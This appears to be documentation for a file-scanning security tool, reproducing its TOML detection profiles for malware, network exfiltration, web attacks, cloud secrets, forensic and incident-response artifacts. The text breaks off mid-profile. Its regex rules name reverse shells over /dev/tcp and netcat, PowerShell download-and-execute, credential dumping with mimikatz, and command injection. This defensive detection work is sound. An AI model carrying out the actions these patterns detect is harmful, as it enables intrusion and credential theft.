# Email Artifacts
[[patterns]]
  name = "PST/OST File"
  pattern = "\\.(?:pst|ost)$"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "EML File"
  pattern = "\\.eml$"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "MBOX File"
  pattern = "\\.mbox$"
  case-insensitive = true
  type = "regex"

# File System Artifacts
[[patterns]]
  name = "Volume Shadow Copy"
  pattern = "(?:System Volume Information|VSS)"
  type = "regex"

[[patterns]]
  name = "Recycle Bin"
  pattern = "(?:\\$Recycle\\.Bin|\\$RECYCLE\\.BIN|\\$I[A-Z0-9]{6}|\\$R[A-Z0-9]{6})"
  type = "regex"

[[patterns]]
  name = "Thumbs.db"
  pattern = "Thumbs\\.db|thumbcache"
  case-insensitive = true
  type = "regex"

[[signatures]]
  name = "Files with Multiple Forensic Indicators"
  query = "SELECT sha256, COUNT(DISTINCT pattern_name) as artifact_count FROM pattern_matches WHERE pattern_name LIKE '%Log%' OR pattern_name LIKE '%History%' OR pattern_name LIKE '%Cache%' GROUP BY sha256 HAVING artifact_count > 2"

[[signatures]]
  name = "Browser Forensic Artifacts"
  query = "SELECT DISTINCT sha256 FROM pattern_matches WHERE pattern_name LIKE 'Browser%'"

Profile: base/malware.toml

Source

Original path: profiles/base/malware.toml

Profile (TOML)

# Malware Detection Profile
# Detects suspicious patterns commonly found in malware

decode = ["base64", "hex", "unicode-escape-sequences"]

[[patterns]]
  name = "Reverse Shell Command"
  pattern = "(?:/bin/(?:ba)?sh|cmd\\.exe)\\s+-[ic]\\s+.*(?:/dev/tcp|nc|netcat)"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "PowerShell Download Execute"
  pattern = "(?:powershell|pwsh).*(?:Invoke-WebRequest|IWR|wget|curl|DownloadString|DownloadFile).*(?:Invoke-Expression|IEX)"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "PowerShell Base64 Encoded Command"
  pattern = "powershell.*-(?:enc|encodedcommand|e)\\s+[A-Za-z0-9+/=]{20,}"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Meterpreter Payload"
  pattern = "meterpreter|msf(?:venom|payload)|reverse_(?:tcp|https?)"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Suspicious Python Socket"
  pattern = "socket\\.socket.*socket\\.AF_INET.*socket\\.SOCK_STREAM.*connect\\("
  type = "regex"

[[patterns]]
  name = "Suspicious Bash Network"
  pattern = "/dev/tcp/[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}/[0-9]+"
  type = "regex"

[[patterns]]
  name = "Common C2 Callback"
  pattern = "(?:POST|GET)\\s+/[a-z0-9]{32,}\\s+HTTP"
  type = "regex"

[[patterns]]
  name = "Encoded PowerShell"
  pattern = "(?:FromBase64String|[System.Convert]::FromBase64String)"
  type = "regex"

[[patterns]]
  name = "WScript Shell"
  pattern = "(?:WScript\\.Shell|Shell\\.Application)"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Suspicious Registry Autorun"
  pattern = "(?:HKCU|HKLM)\\\\(?:Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\(?:Run|RunOnce)|System\\\\CurrentControlSet\\\\Services)"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Anti-Debugging"
  pattern = "(?:IsDebuggerPresent|CheckRemoteDebuggerPresent|NtQueryInformationProcess|OutputDebugString)"
  type = "regex"

[[patterns]]
  name = "Anti-VM"
  pattern = "(?:VMware|VirtualBox|VBOX|Virtual HD|QEMU|Xen|Hyper-V)"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "DLL Injection"
  pattern = "(?:LoadLibrary|GetProcAddress|VirtualAllocEx|WriteProcessMemory|CreateRemoteThread)"
  type = "regex"

[[patterns]]
  name = "Privilege Escalation"
  pattern = "(?:SeDebugPrivilege|SeImpersonatePrivilege|SeTcbPrivilege|SeBackupPrivilege|SeRestorePrivilege)"
  type = "regex"

[[patterns]]
  name = "Persistence Mechanism"
  pattern = "(?:schtasks|at\\.exe|wmic.*process|sc\\.exe.*create)"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Credential Dumping"
  pattern = "(?:mimikatz|lsass\\.exe|procdump|pwdump|gsecdump)"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Suspicious Obfuscation"
  pattern = "(?:eval|exec|compile|importlib|__import__)\\s*\\("
  type = "regex"

[[patterns]]
  name = "PE Executable Header"
  pattern = "4D:5A"
  type = "bytes"

[[patterns]]
  name = "ELF Executable Header"
  pattern = "7F:45:4C:46"
  type = "bytes"

[[patterns]]
  name = "Mach-O Executable Header (32-bit)"
  pattern = "FE:ED:FA:CE"
  type = "bytes"

[[patterns]]
  name = "Mach-O Executable Header (64-bit)"
  pattern = "FE:ED:FA:CF"
  type = "bytes"

[[signatures]]
  name = "High Entropy Suspicious Files"
  query = "SELECT sha256 FROM unique_files WHERE shannon_entropy > 7.8"

[[signatures]]
  name = "Files with Multiple Malware Indicators"
  query = "SELECT sha256, COUNT(*) as indicator_count FROM pattern_matches WHERE pattern_name LIKE '%Shell%' OR pattern_name LIKE '%Injection%' OR pattern_name LIKE '%Anti-%' GROUP BY sha256 HAVING indicator_count > 2"

Profile: base/network.toml

Source

Original path: profiles/base/network.toml

Profile (TOML)

# Network Operations Profile
# Detects network-related operations and potential data exfiltration

decode = ["base64", "percent-encoding"]

[[patterns]]
  name = "HTTP URL"
  pattern = "https?://(?:[a-zA-Z0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+"
  type = "regex"

[[patterns]]
  name = "FTP URL"
  pattern = "ftp://(?:[a-zA-Z0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+"
  type = "regex"

[[patterns]]
  name = "WebSocket URL"
  pattern = "wss?://(?:[a-zA-Z0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+"
  type = "regex"

[[patterns]]
  name = "Socket Connection"
  pattern = "(?:socket\\.(?:socket|connect)|new\\s+Socket|ServerSocket|DatagramSocket)"
  type = "regex"

[[patterns]]
  name = "URL Connection"
  pattern = "(?:URL|HttpURLConnection|URLConnection|HttpClient)\\.(?:openConnection|connect)"
  type = "regex"

[[patterns]]
  name = "wget Command"
  pattern = "wget\\s+(?:-[a-zA-Z0-9]+\\s+)*https?://"
  type = "regex"

[[patterns]]
  name = "curl Command"
  pattern = "curl\\s+(?:-[a-zA-Z0-9]+\\s+)*https?://"
  type = "regex"

[[patterns]]
  name = "Netcat Usage"
  pattern = "(?:nc|netcat)\\s+-[a-z]*[el]"
  type = "regex"

[[patterns]]
  name = "DNS Query"
  pattern = "(?:nslookup|dig|host)\\s+[a-zA-Z0-9.-]+"
  type = "regex"

[[patterns]]
  name = "Port Scanning"
  pattern = "(?:nmap|masscan|zmap)\\s+"
  type = "regex"

[[patterns]]
  name = "Proxy Configuration"
  pattern = "(?:proxy|socks)\\s*[:=]\\s*(?:https?://)?[a-zA-Z0-9.-]+:[0-9]+"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Base64 Encoded URL"
  pattern = "aHR0c(?:HM6|DovL)[A-Za-z0-9+/=]+"
  type = "regex"

[[patterns]]
  name = "Data Exfiltration (POST)"
  pattern = "POST\\s+/.*\\s+HTTP/1\\.[01]"
  type = "regex"

[[patterns]]
  name = "HTTP Header Manipulation"
  pattern = "(?:setRequestHeader|addHeader|setHeader)\\("
  type = "regex"

[[patterns]]
  name = "Cookie Manipulation"
  pattern = "document\\.cookie\\s*="
  type = "regex"

[[patterns]]
  name = "XMLHttpRequest"
  pattern = "new\\s+XMLHttpRequest\\(\\)"
  type = "regex"

[[patterns]]
  name = "Fetch API"
  pattern = "fetch\\s*\\("
  type = "regex"

[[patterns]]
  name = "Network Interface"
  pattern = "NetworkInterface\\.getNetworkInterfaces\\(\\)"
  type = "regex"

[[patterns]]
  name = "IP Configuration"
  pattern = "(?:ifconfig|ipconfig|ip\\s+addr)"
  type = "regex"

[[patterns]]
  name = "Remote Desktop"
  pattern = "(?:rdp|vnc|teamviewer|anydesk)://[a-zA-Z0-9.-]+(?::[0-9]+)?"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "SSH Connection"
  pattern = "ssh\\s+(?:[a-zA-Z0-9._-]+@)?[a-zA-Z0-9.-]+"
  type = "regex"

[[patterns]]
  name = "Localhost Connection"
  pattern = "(?:localhost|127\\.0\\.0\\.1|0\\.0\\.0\\.0|\\[::\\]):[0-9]+"
  type = "regex"

[[patterns]]
  name = "C2 Beacon Pattern"
  pattern = "(?:beacon|heartbeat|checkin).*https?://"
  case-insensitive = true
  type = "regex"

[[signatures]]
  name = "Files with Multiple Network Operations"
  query = "SELECT sha256, COUNT(DISTINCT pattern_name) as net_ops FROM pattern_matches WHERE pattern_name LIKE '%URL%' OR pattern_name LIKE '%Socket%' OR pattern_name LIKE '%Connection%' GROUP BY sha256 HAVING net_ops > 3"

[[signatures]]
  name = "Potential Data Exfiltration"
  query = "SELECT DISTINCT sha256 FROM pattern_matches WHERE pattern_name IN ('Data Exfiltration (POST)', 'Base64 Encoded URL', 'HTTP URL')"

Profile: base/system-artifacts.toml

Source

Original path: profiles/base/system-artifacts.toml

Profile (TOML)

# System Artifacts Profile
# Inspired by UAC - detects system configuration, logs, and administrative artifacts

decode = ["base64", "percent-encoding"]

# System Configuration Files (Windows)
[[patterns]]
  name = "Windows System File"
  pattern = "(?:system32|SysWOW64)\\\\[^\\\\]+\\.(?:exe|dll|sys)"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Windows INI File"
  pattern = "\\.ini$"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Windows Policy File"
  pattern = "(?:gpedit\\.msc|secpol\\.msc|group policy)"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Scheduled Task XML"
  pattern = "Tasks\\\\[^\\\\]+\\.xml"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Service Configuration"
  pattern = "HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\CurrentControlSet\\\\Services"
  type = "regex"

# System Configuration Files (Unix/Linux)
[[patterns]]
  name = "Crontab"
  pattern = "(?:/etc/crontab|/var/spool/cron)"
  type = "regex"

[[patterns]]
  name = "Unix Config File"
  pattern = "/etc/[a-z0-9._-]+\\.conf"
  type = "regex"

[[patterns]]
  name = "Systemd Service"
  pattern = "\\.service$"
  type = "regex"

[[patterns]]
  name = "Init Script"
  pattern = "/etc/init\\.d/"
  type = "string"

[[patterns]]
  name = "RC Script"
  pattern = "/etc/rc[0-6]\\.d/"
  type = "regex"

[[patterns]]
  name = "Passwd File"
  pattern = "/etc/passwd"
  type = "string"

[[patterns]]
  name = "Shadow File"
  pattern = "/etc/shadow"
  type = "string"

[[patterns]]
  name = "Sudoers File"
  pattern = "/etc/sudoers"
  type = "string"

[[patterns]]
  name = "SSH Config"
  pattern = "/etc/ssh/sshd_config|~/.ssh/config"
  type = "regex"

# Log Files
[[patterns]]
  name = "Application Log"
  pattern = "\\.log$"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Windows Event Reference"
  pattern = "Event(?:Log|Viewer)|Application\\.evtx"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "IIS Log"
  pattern = "u_ex\\d{6}\\.log"
  type = "regex"

[[patterns]]
  name = "Apache/Nginx Log"
  pattern = "(?:access|error)\\.log"
  type = "regex"

[[patterns]]
  name = "Audit Log"
  pattern = "/var/log/audit/audit\\.log"
  type = "string"

# User Activity
[[patterns]]
  name = "User Profile Path"
  pattern = "(?:C:\\\\Users\\\\|/home/|/Users/)[^/\\\\]+"
  type = "regex"

[[patterns]]
  name = "Desktop File"
  pattern = "(?:Desktop|Documents|Downloads)[\\\\/]"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "AppData Reference"
  pattern = "AppData\\\\(?:Local|Roaming|LocalLow)"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Temp Directory"
  pattern = "(?:C:\\\\(?:Temp|Windows\\\\Temp)|/tmp/|/var/tmp/)"
  case-insensitive = true
  type = "regex"

# Network Configuration
[[patterns]]
  name = "Hosts File"
  pattern = "/etc/hosts|C:\\\\Windows\\\\System32\\\\drivers\\\\etc\\\\hosts"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Network Interface Config"
  pattern = "/etc/network/interfaces|/etc/sysconfig/network-scripts"
  type = "regex"

[[patterns]]
  name = "Resolv.conf"
  pattern = "/etc/resolv\\.conf"
  type = "string"

# Startup and Autorun
[[patterns]]
  name = "Autorun Registry Key"
  pattern = "SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\(?:Run|RunOnce)"
  type = "regex"

[[patterns]]
  name = "Startup Folder"
  pattern = "Start Menu\\\\Programs\\\\Startup"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Boot Configuration"
  pattern = "(?:boot\\.ini|BCD)"
  case-insensitive = true
  type = "regex"

[[signatures]]
  name = "System Configuration Changes"
  query = "SELECT DISTINCT sha256 FROM pattern_matches WHERE pattern_name LIKE '%Config%' OR pattern_name LIKE '%Service%'"

[[signatures]]
  name = "User Activity Artifacts"
  query = "SELECT sha256 FROM pattern_matches WHERE pattern_name IN ('User Profile Path', 'Desktop File', 'AppData Reference', 'Temp Directory')"

Profile: base/web.toml

Source

Original path: profiles/base/web.toml

Profile (TOML)

# Web Security Profile
# Detects web vulnerabilities and suspicious web-related patterns

decode = ["base64", "percent-encoding", "html-entity", "unicode-escape-sequences"]

[[patterns]]
  name = "SQL Injection Pattern"
  pattern = "(?:union.*select|select.*from|insert.*into|delete.*from|update.*set|drop.*table).*(?:--|#|/\\*)"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "XSS Script Tag"
  pattern = "<script[^>]*>.*</script>"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "XSS Event Handler"
  pattern = "(?:on(?:load|error|click|mouseover|focus|blur))\\s*=\\s*[\"']?(?:javascript:|alert\\(|prompt\\(|confirm\\()"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Path Traversal"
  pattern = "\\.\\./|\\.\\.\\\\"
  type = "regex"

[[patterns]]
  name = "Command Injection"
  pattern = "(?:[;&|]|`|\\$\\().*(?:cat|ls|wget|curl|bash|sh|nc|netcat|chmod|chown)"
  type = "regex"

[[patterns]]
  name = "LDAP Injection"
  pattern = "(?:\\*\\)|\\(\\||\\(&|\\(!).*(?:cn=|uid=|ou=|dc=)"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "XXE Attack"
  pattern = "<!ENTITY.*SYSTEM"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Server-Side Template Injection"
  pattern = "\\{\\{.*\\}\\}|\\{%.*%\\}|\\$\\{.*\\}"
  type = "regex"

[[patterns]]
  name = "PHP Code Injection"
  pattern = "(?:eval|assert|system|exec|shell_exec|passthru|proc_open|popen)\\s*\\("
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Webshell Indicator"
  pattern = "(?:c99|r57|b374k|wso|shell|webshell|backdoor|FilesMan)"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Deserialization Attack"
  pattern = "(?:__reduce__|__setstate__|pickle|yaml\\.load|unserialize|json_decode)"
  type = "regex"

[[patterns]]
  name = "SSRF Pattern"
  pattern = "(?:file://|gopher://|dict://|ftp://|tftp://)(?:localhost|127\\.0\\.0\\.1|0\\.0\\.0\\.0|\\[::\\])"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Open Redirect"
  pattern = "(?:url|redirect|next|return|returnto)\\s*=\\s*(?:https?://|//)"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "JSP Expression"
  pattern = "<%=\\s*[^%>]+\\s*%>"
  type = "regex"

[[patterns]]
  name = "JSP Scriptlet"
  pattern = "<%[^%>]+%>"
  type = "regex"

[[patterns]]
  name = "Suspicious Request Parameter"
  pattern = "request\\.(?:getParameter|getHeader|getAttribute)\\([^)]+\\)"
  type = "regex"

[[patterns]]
  name = "Response Writer"
  pattern = "response\\.(?:getWriter|getOutputStream)\\(\\)"
  type = "regex"

[[patterns]]
  name = "File Upload"
  pattern = "(?:upload|multipart/form-data|FileItem|DiskFileItemFactory)"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Insecure Deserialization"
  pattern = "(?:ObjectInputStream|readObject|XMLDecoder)"
  type = "regex"

[[patterns]]
  name = "Hardcoded Session Key"
  pattern = "(?:session[_-]?(?:key|secret|id))\\s*[:=]\\s*[\"'][a-zA-Z0-9]{16,}[\"']"
  case-insensitive = true
  type = "regex"

[[signatures]]
  name = "Files with SQL Injection Patterns"
  query = "SELECT DISTINCT sha256 FROM pattern_matches WHERE pattern_name LIKE '%SQL%'"

[[signatures]]
  name = "Files with Multiple Web Vulnerabilities"
  query = "SELECT sha256, COUNT(DISTINCT pattern_name) as vuln_count FROM pattern_matches WHERE pattern_name IN ('XSS Script Tag', 'XSS Event Handler', 'SQL Injection Pattern', 'Path Traversal', 'Command Injection') GROUP BY sha256 HAVING vuln_count > 1"

Profile: commands-example.toml

Source

Original path: profiles/commands-example.toml

Profile (TOML)

# Example Profile: Command Execution
# This profile demonstrates the command execution features in sus
#
# Commands are organized into groups, with each group containing one or more
# inline commands. Group-level settings (os, arch, ignore-errors, etc.) are
# inherited by all commands in the group, but can be overridden per-command.

# Simple command group - runs on any platform
[[commands]]
  name = "Echo Test"
  ignore-errors = true
    [[commands.commands]]
      command = "echo 'Hello from sus profile'"

# OS-specific command groups
[[commands]]
  name = "Windows System Info"
  os = ["windows"]
  ignore-errors = true
  target = "local"
    [[commands.commands]]
      command = "systeminfo"

[[commands]]
  name = "Linux System Info"
  os = ["linux"]
  target = "local"
    [[commands.commands]]
      command = "uname -a"

[[commands]]
  name = "macOS System Info"
  os = ["macos"]
  target = "local"
    [[commands.commands]]
      command = "sw_vers"

# Command group with architecture filter
[[commands]]
  name = "x86_64 Specific"
  arch = ["x86-64"]
  ignore-errors = true
    [[commands.commands]]
      command = "echo 'Running on x86_64'"

# Command group with environment variables (inherited by all commands)
[[commands]]
  name = "Environment Test"
  os = ["linux", "macos"]
  env = [["CUSTOM_VAR", "custom_value"]]
  ignore-errors = true
    [[commands.commands]]
      command = "echo $CUSTOM_VAR"
    [[commands.commands]]
      command = "printenv CUSTOM_VAR"

# Command group with working directory
[[commands]]
  name = "List Temp Directory"
  os = ["linux", "macos"]
  working-dir = "/tmp"
  ignore-errors = true
    [[commands.commands]]
      command = "ls -la"

# Multiple commands in a group sharing settings
[[commands]]
  name = "Hardware Info"
  os = ["linux"]
  ignore-errors = true
    [[commands.commands]]
      command = "lscpu"
    [[commands.commands]]
      command = "free -h"
    [[commands.commands]]
      command = "df -h"

# Network information group
[[commands]]
  name = "Network Info"
  os = ["linux"]
  ignore-errors = true
    [[commands.commands]]
      command = "ip addr show"
    [[commands.commands]]
      command = "ip route show"

# Command group with a matrix - runs all commands for each OS/arch combination
[[commands]]
  name = "Cross-Platform Matrix"
  ignore-errors = true
    [commands.matrix]
      os = ["linux"]
      arch = ["x86-64"]
    [[commands.commands]]
      command = "uname -m"
    [[commands.commands]]
      command = "echo 'Platform-specific check'"

# Per-command overrides within a group
[[commands]]
  name = "Mixed Error Handling"
  ignore-errors = true
    [[commands.commands]]
      command = "echo 'This can fail'"
    [[commands.commands]]
      command = "critical-command"
      ignore-errors = false
    [[commands.commands]]
      command = "echo 'This also can fail'"

# Agent-targeted command group
[[commands]]
  name = "Agent Commands"
  os = ["linux"]
  target = "agent"
  ignore-errors = true
    [[commands.commands]]
      command = "hostname"
    [[commands.commands]]
      command = "uptime"

Profile: composite/cloud-security.toml

Source

Original path: profiles/composite/cloud-security.toml

Profile (TOML)

# Cloud Security Profile
# Detects cloud-specific security issues (AWS, Azure, GCP)

includes = [
  "../base/credentials.toml"
]

decode = ["base64", "percent-encoding"]

# AWS-specific patterns
[[patterns]]
  name = "AWS ARN"
  pattern = "arn:aws:[a-z0-9-]+:[a-z0-9-]*:\\d{12}:[a-zA-Z0-9/_-]+"
  type = "regex"

[[patterns]]
  name = "AWS Account ID"
  pattern = "\\b\\d{12}\\b"
  type = "regex"

[[patterns]]
  name = "AWS S3 Bucket"
  pattern = "s3://[a-z0-9.-]+"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "AWS S3 URL"
  pattern = "https?://[a-z0-9.-]+\\.s3(?:[.-][a-z0-9-]+)?\\.amazonaws\\.com"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "AWS Lambda Function"
  pattern = "arn:aws:lambda:[a-z0-9-]+:\\d{12}:function:[a-zA-Z0-9-_]+"
  type = "regex"

# Azure-specific patterns
[[patterns]]
  name = "Azure Storage Account Key"
  pattern = "DefaultEndpointsProtocol=https;AccountName=[a-z0-9]+;AccountKey=[A-Za-z0-9+/=]{88}"
  type = "regex"

[[patterns]]
  name = "Azure Storage Connection String"
  pattern = "DefaultEndpointsProtocol=https;AccountName=[^;]+;AccountKey=[^;]+"
  type = "regex"

[[patterns]]
  name = "Azure Client Secret"
  pattern = "(?:azure|microsoft)[_-]?(?:client|application)[_-]?secret\\s*[:=]\\s*[\"']?[A-Za-z0-9~._-]{34,40}[\"']?"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Azure Subscription ID"
  pattern = "[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}"
  type = "regex"

# GCP-specific patterns
[[patterns]]
  name = "GCP Service Account Key"
  pattern = "\"type\":\\s*\"service_account\",\\s*\"project_id\":\\s*\"[^\"]+\",\\s*\"private_key_id\":"
  type = "regex"

[[patterns]]
  name = "GCP Project ID"
  pattern = "(?:project[_-]?id|gcp[_-]?project)\\s*[:=]\\s*[\"']?[a-z][a-z0-9-]{4,28}[a-z0-9][\"']?"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "GCP Cloud Storage Bucket"
  pattern = "gs://[a-z0-9._-]+"
  type = "regex"

# Generic cloud patterns
[[patterns]]
  name = "Cloud Provider Config"
  pattern = "(?:aws|azure|gcp|google-cloud)_config"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Terraform State File"
  pattern = "terraform\\.tfstate"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Kubernetes Secret"
  pattern = "apiVersion:\\s*v1\\s*kind:\\s*Secret"
  type = "regex"

[[patterns]]
  name = "Docker Registry Credentials"
  pattern = "\"auths\":\\s*\\{[^}]+\\}"
  type = "regex"

[[signatures]]
  name = "Cloud Credential Exposure"
  query = "SELECT DISTINCT sha256 FROM pattern_matches WHERE pattern_name LIKE '%AWS%' OR pattern_name LIKE '%Azure%' OR pattern_name LIKE '%GCP%' OR pattern_name LIKE 'Google%'"

[[signatures]]
  name = "Infrastructure as Code Secrets"
  query = "SELECT sha256 FROM pattern_matches WHERE pattern_name IN ('Terraform State File', 'Kubernetes Secret', 'Docker Registry Credentials')"

Profile: composite/forensic-investigation.toml

Source

Original path: profiles/composite/forensic-investigation.toml

Profile (TOML)

# Digital Forensics Investigation Profile
# Inspired by KAPE's comprehensive forensic collection
# Combines all forensic artifact profiles for complete investigation

includes = [
  "../base/forensics.toml",
  "../base/system-artifacts.toml",
  "../base/browser-artifacts.toml",
  "../base/malware.toml",
  "../base/network.toml"
]

# Additional forensic investigation patterns
[[patterns]]
  name = "Evidence File"
  pattern = "(?:evidence|seized|exhibit).*\\.(e01|raw|dd|aff)"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Forensic Image"
  pattern = "\\.(?:e01|ex01|s01|vmdk|vhd|vhdx)$"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Timeline File"
  pattern = "(?:timeline|supertimeline|l2t)"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Case File"
  pattern = "(?:case|investigation)_\\d+"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Chain of Custody"
  pattern = "(?:chain.?of.?custody|evidence.?log)"
  case-insensitive = true
  type = "regex"

[[signatures]]
  name = "Forensic Evidence Files"
  query = "SELECT DISTINCT sha256 FROM pattern_matches WHERE pattern_name IN ('Evidence File', 'Forensic Image', 'Timeline File')"

[[signatures]]
  name = "Comprehensive Forensic Artifacts"
  query = "SELECT sha256, COUNT(DISTINCT pattern_name) as total_artifacts FROM pattern_matches GROUP BY sha256 HAVING total_artifacts > 5 ORDER BY total_artifacts DESC"

[[signatures]]
  name = "High Priority Forensic Findings"
  query = "SELECT DISTINCT sha256 FROM pattern_matches WHERE pattern_name IN ('Memory Dump File', 'Registry Hive', 'Browser History', 'Event Log', 'Bash History')"

Profile: composite/full-scan.toml

Source

Original path: profiles/composite/full-scan.toml

Profile (TOML)

# Full Scan Profile
# Complete security scan combining all base profiles

includes = [
  "../base/credentials.toml",
  "../base/malware.toml",
  "../base/web.toml",
  "../base/compliance.toml",
  "../base/crypto.toml",
  "../base/network.toml"
]

# Maximum file size for comprehensive scanning (100MB)
max-file-size = 104857600

[[signatures]]
  name = "High Risk Files"
  query = "SELECT DISTINCT sha256 FROM pattern_matches WHERE pattern_name IN ('AWS Access Key', 'Private Key Header', 'Reverse Shell Command', 'SQL Injection Pattern', 'Command Injection') OR pattern_name LIKE 'PowerShell%'"

[[signatures]]
  name = "Files Requiring Manual Review"
  query = "SELECT sha256, COUNT(DISTINCT pattern_name) as total_matches FROM pattern_matches GROUP BY sha256 HAVING total_matches > 10"

Profile: composite/incident-response.toml

Source

Original path: profiles/composite/incident-response.toml

Profile (TOML)

# Incident Response Profile
# Focused profile for incident response and threat hunting

includes = [
  "../base/malware.toml",
  "../base/network.toml",
  "../base/credentials.toml"
]

decode = ["base64", "hex", "unicode-escape-sequences"]

# Focus on recently modified files
[[patterns]]
  name = "Suspicious Timestamp Modification"
  pattern = "(?:touch|timestomp|SetFileTime)"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Log Deletion"
  pattern = "(?:clear-eventlog|wevtutil.*cl|rm.*\\.log|del.*\\.log)"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Firewall Modification"
  pattern = "(?:netsh.*firewall|iptables|ufw|firewall-cmd)"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Account Creation"
  pattern = "(?:net\\s+user.*\\/add|useradd|adduser|New-LocalUser)"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Lateral Movement"
  pattern = "(?:psexec|winrm|wmi.*process|sc.*\\\\\\\\|net\\s+use\\s+\\\\\\\\)"
  case-insensitive = true
  type = "regex"

[[signatures]]
  name = "Compromised Indicators"
  query = "SELECT DISTINCT sha256 FROM pattern_matches WHERE pattern_name LIKE '%Shell%' OR pattern_name LIKE '%Credential%' OR pattern_name LIKE '%Lateral%'"

[[signatures]]
  name = "Very High Entropy Files"
  query = "SELECT sha256, shannon_entropy FROM unique_files WHERE shannon_entropy > 7.9 ORDER BY shannon_entropy DESC"

Profile: composite/live-response.toml

Source

Original path: profiles/composite/live-response.toml

Profile (TOML)

# Live Response Profile
# Inspired by UAC's live response capabilities
# Focuses on volatile data and live system artifacts

includes = [
  "../base/system-artifacts.toml",
  "../base/malware.toml",
  "../base/network.toml"
]

decode = ["base64", "hex"]

# Process and Memory Artifacts
[[patterns]]
  name = "Running Process"
  pattern = "(?:tasklist|ps aux|top|htop)"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Process ID"
  pattern = "(?:PID|pid)\\s*[:=]?\\s*\\d+"
  type = "regex"

[[patterns]]
  name = "Loaded Module"
  pattern = "(?:LoadedModule|DLL.*loaded)"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Open Handle"
  pattern = "(?:handle|file.*descriptor)\\s+\\d+"
  case-insensitive = true
  type = "regex"

# Network Connections
[[patterns]]
  name = "Active Connection"
  pattern = "(?:ESTABLISHED|LISTEN|TIME_WAIT)"
  type = "regex"

[[patterns]]
  name = "Netstat Output"
  pattern = "(?:netstat|ss|lsof)"
  type = "regex"

[[patterns]]
  name = "Local Port"
  pattern = "(?:0\\.0\\.0\\.0|127\\.0\\.0\\.1|localhost):\\d+"
  type = "regex"

[[patterns]]
  name = "Foreign Address"
  pattern = "\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}:\\d+"
  type = "regex"

# System Information
[[patterns]]
  name = "System Uptime"
  pattern = "(?:uptime|up\\s+\\d+\\s+days)"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Logged In User"
  pattern = "(?:who|w|users|query user)"
  type = "regex"

[[patterns]]
  name = "Environment Variable"
  pattern = "(?:PATH|HOME|USER|TEMP)="
  type = "regex"

[[patterns]]
  name = "System Time"
  pattern = "(?:date|time)\\s*:\\s*\\d{4}-\\d{2}-\\d{2}"
  case-insensitive = true
  type = "regex"

# Volatile Registry Keys (Windows)
[[patterns]]
  name = "RunMRU"
  pattern = "RunMRU"
  type = "string"

[[patterns]]
  name = "TypedURLs"
  pattern = "TypedURLs"
  type = "string"

[[patterns]]
  name = "UserAssist"
  pattern = "UserAssist"
  type = "string"

[[patterns]]
  name = "MUICache"
  pattern = "MUICache"
  type = "string"

# Command History
[[patterns]]
  name = "PowerShell History"
  pattern = "ConsoleHost_history\\.txt"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "CMD History"
  pattern = "doskey.*history"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Recent Commands"
  pattern = "(?:history|fc -l)"
  type = "regex"

# Live Malware Indicators
[[patterns]]
